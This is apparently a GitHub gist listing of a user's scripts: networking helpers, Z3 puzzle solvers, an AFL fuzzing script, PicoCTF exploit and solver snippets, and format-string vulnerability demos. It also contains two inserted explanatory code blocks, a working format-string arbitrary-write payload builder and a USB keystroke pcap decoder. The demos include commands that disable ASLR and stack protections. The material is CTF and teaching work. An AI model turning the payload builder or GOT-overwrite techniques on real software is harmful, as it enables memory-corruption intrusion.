Mohd Shahril shahril96
@shahril96
shahril96 / tmpunk-helper.py
Last active June 24, 2017 03:49
Script to make my daily routine tasks...well...not routine anymore. (intended to be run inside Arch Linux)
import os
import sys
import re
import subprocess
import time
PPPD_WAITTIMEOUT = 10
#####################################
@shahril96
shahril96 / pppoeconf.py
Last active June 23, 2017 23:47
My own version of simple pppoeconf (intended to be used inside Arch Linux)
import os
import sys
import re
import subprocess
import pprint
def papsecret(username, password):
papfile = """\r# Secrets for authentication using PAP
@shahril96
shahril96 / z3_prime.py
Last active June 25, 2021 00:16
Generating list of valid prime numbers using Z3 theorem prover
'''
Using Z3 to check if the number is prime
Original reference: https://stackoverflow.com/a/35653749/1768052
'''
from z3 import *
def isPrime(x):
y, z = Ints("y z")
@shahril96
shahril96 / garden_puzzle_z3.py
Created May 28, 2017 23:41
Using Z3 Theorem Solver to solve for Gardens Puzzle
import sys
import itertools
from z3 import *
#
# Original puzzle
#
'''
Five friends have their gardens next to one another, where they grow three kinds of crops:
@shahril96
shahril96 / run-fuzzer.sh
Last active January 30, 2018 17:47
Bash script to simplify running AFL (American Fuzzy Lop)
#
# README
#
# Bash script to simplify running AFL (American Fuzzy Lop)
#
# It will:
# - build with AFL_HARDEN=1 (stack protector + FORTIFY_SOURCE) to catch simple memory corruption
# - use libdislocator to detect heap memory corruption
# - run several AFL instances in parallel (separate processes, one master and secondaries), each in one pane of a tmux window split four ways, to ease viewing
@shahril96
shahril96 / matrix.py
Last active July 13, 2023 14:31
Exploit for PicoCTF's Enter the Matrix challenge.
from pwn import *
import struct
import binascii
FREE_GOT = 0x804a10c
SETBUF_GOT = 0x804a104
FREE_LIBC = 0x76110 # pico: 0x76110, local: 0x712f0
SYSTEM_LIBC = 0x3e3e0 # pico: 0x3e3e0, local: 0x3ada0
@shahril96
shahril96 / pico_consoleconfig.py
Created May 10, 2017 10:16
Python write-up for PicoCTF 2017's Console Config format string vulnerability challenge.
'''
Greetz to @_py on the 0x00sec.org forum!
Without his awesome write-up (link below), I wouldn't have been able to understand and finish this challenge.
Link: https://0x00sec.org/t/picoctf-write-up-bypassing-aslr-via-format-string-bug/1920
'''
@shahril96
shahril96 / format_string_got.c
Last active November 26, 2021 03:17
A demonstration of how to overwrite a GOT (Global Offset Table) entry using a format string vulnerability.
/*
DISABLE ASLR (sysctl) AND STACK CANARIES / NX (compile flags):
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR system-wide
$ gcc -fno-stack-protector -z execstack -o format_string format_string.c -g # no stack canaries, executable stack (NX/DEP disabled)
#############
# CODE POC
#############
@shahril96
shahril96 / format_string.c
Last active May 2, 2017 07:19
A demonstration of how to write to arbitrary addresses using a format string vulnerability
/*
 * disable ASLR & compile:
 * $ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR system-wide
 * $ gcc -fno-stack-protector -z execstack -o format_string format_string.c -m32 -g # 32-bit build, no stack canaries, executable stack (NX/DEP disabled)
*
 * addresses to write (the 4-byte value is stored as two 2-byte halves):
 * val = 0x804a020 (addr, low half)
 * val+2 = 0x804a022 (high half)
*
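The format-string gists above (format_string.c, format_string_got.c and the Console Config write-up) all rest on one primitive: place the target address on the stack, pad printf's output with %Nc until its byte counter equals the wanted value, then store the counter with %hn, two bytes at a time (val, then val+2 as in the header above; for the GOT variant the target is a GOT slot such as FREE_GOT and the value is the address of system()). The block below is an added example, not code from these gists: a pure-Python payload builder plus a small printf model that replays the payload against a mock 32-bit stack, so the write can be checked without a binary. It assumes a 32-bit little-endian target, glibc's acceptance of positional `%N$hn` mixed with `%Nc`, and that the stack offset at which the payload appears has already been found (by probing with `%N$x` markers); the addresses and values in the demo are constructed from the constants shown on this page.

```python
import re
import struct


def build_fmt_write(addr: int, value: int, offset: int, written: int = 0) -> bytes:
    """Build a format-string payload that writes the 32-bit `value` to `addr`.

    Two %hn stores are used: the low half at addr and the high half at addr + 2
    (the val / val+2 pair of the gist header). `offset` is the 1-based printf
    argument position at which the first 4 bytes of the payload are found on the
    stack; `written` is how many bytes printf printed before the payload.
    """
    halves = [(addr, value & 0xFFFF), (addr + 2, (value >> 16) & 0xFFFF)]
    payload = b"".join(struct.pack("<I", a) for a, _ in halves)  # addresses go first
    if b"\x00" in payload:
        raise ValueError("address contains a NUL byte; printf would stop reading there")
    count = written + len(payload)  # the raw address bytes are printed, so they count too
    fmt = ""
    # Emit the smaller half first so the counter only ever needs to grow; %hn stores the
    # low 16 bits of the counter, so wrapping past 0xffff on the way is harmless.
    for i, (_, half) in sorted(enumerate(halves), key=lambda t: t[1][1]):
        pad = (half - count) % 0x10000
        if pad:
            fmt += f"%{pad}c"  # prints `pad` bytes (one char, left-padded to width pad)
            count += pad
        fmt += f"%{offset + i}$hn"  # store the low 16 bits of the counter at halves[i]
    return payload + fmt.encode()


# Tokens the builder emits: %Nc, %N$hn, and any other byte (printed literally).
_TOKEN = re.compile(rb"%(\d*)c|%(\d+)\$hn|(.)", re.DOTALL)


def simulate_printf(payload: bytes, offset: int):
    """Model printf(payload) on a 32-bit stack where the payload sits at argument `offset`.

    Returns (bytes_printed, memory); memory maps byte addresses to bytes stored by %hn.
    Only the directives build_fmt_write produces are modelled.
    """
    padded = payload + b"\x00" * (-len(payload) % 4)
    words = struct.unpack(f"<{len(padded) // 4}I", padded)
    stack = [0] * (offset - 1) + list(words)  # args 1..offset-1 are the callee's own junk
    count, mem = 0, {}
    for m in _TOKEN.finditer(payload):
        width, argpos, literal = m.groups()
        if literal is not None:
            count += 1
        elif argpos is None:  # %Nc: a field width of N prints N bytes (minimum 1)
            count += max(int(width or 1), 1)
        else:  # %N$hn: store the counter, 2 bytes little-endian, at stack word N
            target = stack[int(argpos) - 1]
            mem[target] = count & 0xFF
            mem[target + 1] = (count >> 8) & 0xFF
    return count, mem


def read_u32(mem: dict, addr: int) -> int:
    return int.from_bytes(bytes(mem.get(addr + i, 0) for i in range(4)), "little")


if __name__ == "__main__":
    # Constructed demo: the `val` address from the format_string.c header, a marker value,
    # and an assumed stack offset of 7 (found on a real target with "%7$x" probing).
    payload = build_fmt_write(0x0804A020, 0xDEADBEEF, offset=7)
    printed, mem = simulate_printf(payload, offset=7)
    print(payload[8:].decode(), "->", hex(read_u32(mem, 0x0804A020)), f"({printed} bytes printed)")
```

The builder refuses addresses containing a NUL byte: with the addresses placed first, printf would stop at that byte before reaching the directives, so such targets need the addresses moved to the end of the buffer (they still sit on the stack as arguments), which this example deliberately does not do. On a real target, replace the mock with the binary and confirm the write by reading the slot back with `%N$x` or in gdb.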
@shahril96
shahril96 / keyboard_pcap.py
Last active October 31, 2019 20:18
Python solution for solving PicoCTF 2017 - Just Keyp Trying
"""
shahril:pico$ python keyboard_pcap.py -f data.pcap
flag{pr355_0nwards_a4263f07}c
"""
from scapy.all import *
from argparse import ArgumentParser
from sys import argv
from collections import OrderedDict
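Just Keyp Trying is the usual USB keyboard capture: every interrupt-IN transfer carries an 8-byte boot-protocol report (modifier byte, reserved byte, up to six key usage IDs), and the flag is recovered by mapping usage IDs to characters with the shift modifier applied. The block below is an added example and not the gist's code (which uses scapy): it reads a classic usbmon pcap with struct only, and the decoder handles the two cases that naive one-report-one-character scripts get wrong, a key held across consecutive reports and backspaces. The report sequence and the in-memory pcap are constructed for the demo; the 48/64-byte usbmon header lengths for link types 189 and 220 and the assumption that a keyboard report is exactly 8 bytes are the things to check against a real capture (tshark's usb.capdata column).

```python
import struct

# USB HID usage IDs (keyboard/keypad page) -> (plain, shifted) character.
# Only what a typical flag needs is mapped; anything else decodes to "?".
KEYMAP = {}
for i, ch in enumerate("abcdefghijklmnopqrstuvwxyz"):
    KEYMAP[0x04 + i] = (ch, ch.upper())
for i, (plain, shifted) in enumerate(zip("1234567890", "!@#$%^&*()")):
    KEYMAP[0x1E + i] = (plain, shifted)
KEYMAP.update({
    0x28: ("\n", "\n"), 0x2C: (" ", " "), 0x2D: ("-", "_"), 0x2E: ("=", "+"),
    0x2F: ("[", "{"), 0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"),
    0x34: ("'", '"'), 0x35: ("`", "~"), 0x36: (",", "<"), 0x37: (".", ">"),
    0x38: ("/", "?"),
})
BACKSPACE = 0x2A
SHIFT_MASK = 0x22  # left shift (bit 1) | right shift (bit 5) of the modifier byte
# pcap link types for Linux usbmon captures and the size of the per-packet usbmon header.
USBMON_HEADER_LEN = {189: 48, 220: 64}  # LINKTYPE_USB_LINUX, LINKTYPE_USB_LINUX_MMAPPED


def hid_reports_from_pcap(data: bytes):
    """Return every 8-byte keyboard report in a classic (non-pcapng) usbmon pcap."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(data[:4])
    if endian is None:
        raise ValueError("not a classic pcap; convert pcapng/nanosecond captures first")
    linktype = struct.unpack(endian + "IHHiIII", data[:24])[6]
    hdr_len = USBMON_HEADER_LEN[linktype]  # KeyError on purpose for non-usbmon captures
    reports, pos = [], 24
    while pos + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[pos:pos + 16])[2]
        pkt = data[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        payload = pkt[hdr_len:]
        if len(payload) == 8:  # interrupt-IN transfer carrying one boot-protocol report
            reports.append(payload)
    return reports


def decode_hid_reports(reports):
    """Turn a sequence of 8-byte reports into text, emitting each key once per press."""
    text, prev_keys = [], set()
    for rep in reports:
        mods, keys = rep[0], [k for k in rep[2:8] if k]
        shifted = bool(mods & SHIFT_MASK)
        for k in keys:
            if k in prev_keys:
                continue  # key still held: the device repeats it in every report until release
            if k == BACKSPACE:
                if text:
                    text.pop()
            else:
                text.append(KEYMAP.get(k, ("?", "?"))[shifted])
        prev_keys = set(keys)
    return "".join(text)


def _rep(mods=0, key=0):
    return bytes([mods, 0, key, 0, 0, 0, 0, 0])


# Constructed keystroke sequence (not from the challenge capture): each press is followed by
# a release report, 'l' is held across two reports, and a stray 'x' is erased with backspace.
SAMPLE_REPORTS = [
    _rep(0, 0x09), _rep(),                  # f
    _rep(0, 0x0F), _rep(0, 0x0F), _rep(),   # l, still held in the second report
    _rep(0, 0x21), _rep(),                  # 4
    _rep(0, 0x0A), _rep(),                  # g
    _rep(0x02, 0x2F), _rep(),               # left shift + [  -> {
    _rep(0, 0x1B), _rep(),                  # x (typo)
    _rep(0, BACKSPACE), _rep(),             # backspace removes the x
    _rep(0, 0x0B), _rep(),                  # h
    _rep(0x20, 0x2D), _rep(),               # right shift + -  -> _
    _rep(0, 0x0C), _rep(),                  # i
    _rep(0, 0x07), _rep(),                  # d
    _rep(0x02, 0x30), _rep(),               # left shift + ]  -> }
]


def build_sample_pcap(reports=SAMPLE_REPORTS) -> bytes:
    """Constructed little-endian pcap (link type 220) wrapping each report in a 64-byte usbmon header."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 220)
    out += struct.pack("<IIII", 0, 0, 64, 64) + b"\x00" * 64  # a transfer with no data: skipped
    for rep in reports:
        out += struct.pack("<IIII", 0, 0, 64 + len(rep), 64 + len(rep)) + b"\x00" * 64 + rep
    return out


if __name__ == "__main__":
    print(decode_hid_reports(hid_reports_from_pcap(build_sample_pcap())))  # fl4g{h_id}
```

With a real capture, read the file into `data` and call `decode_hid_reports(hid_reports_from_pcap(data))`; if the result is garbage, first check the link type and header length (a Windows USBPcap capture uses a different, variable-length header) and whether the device sends something other than the 8-byte boot report.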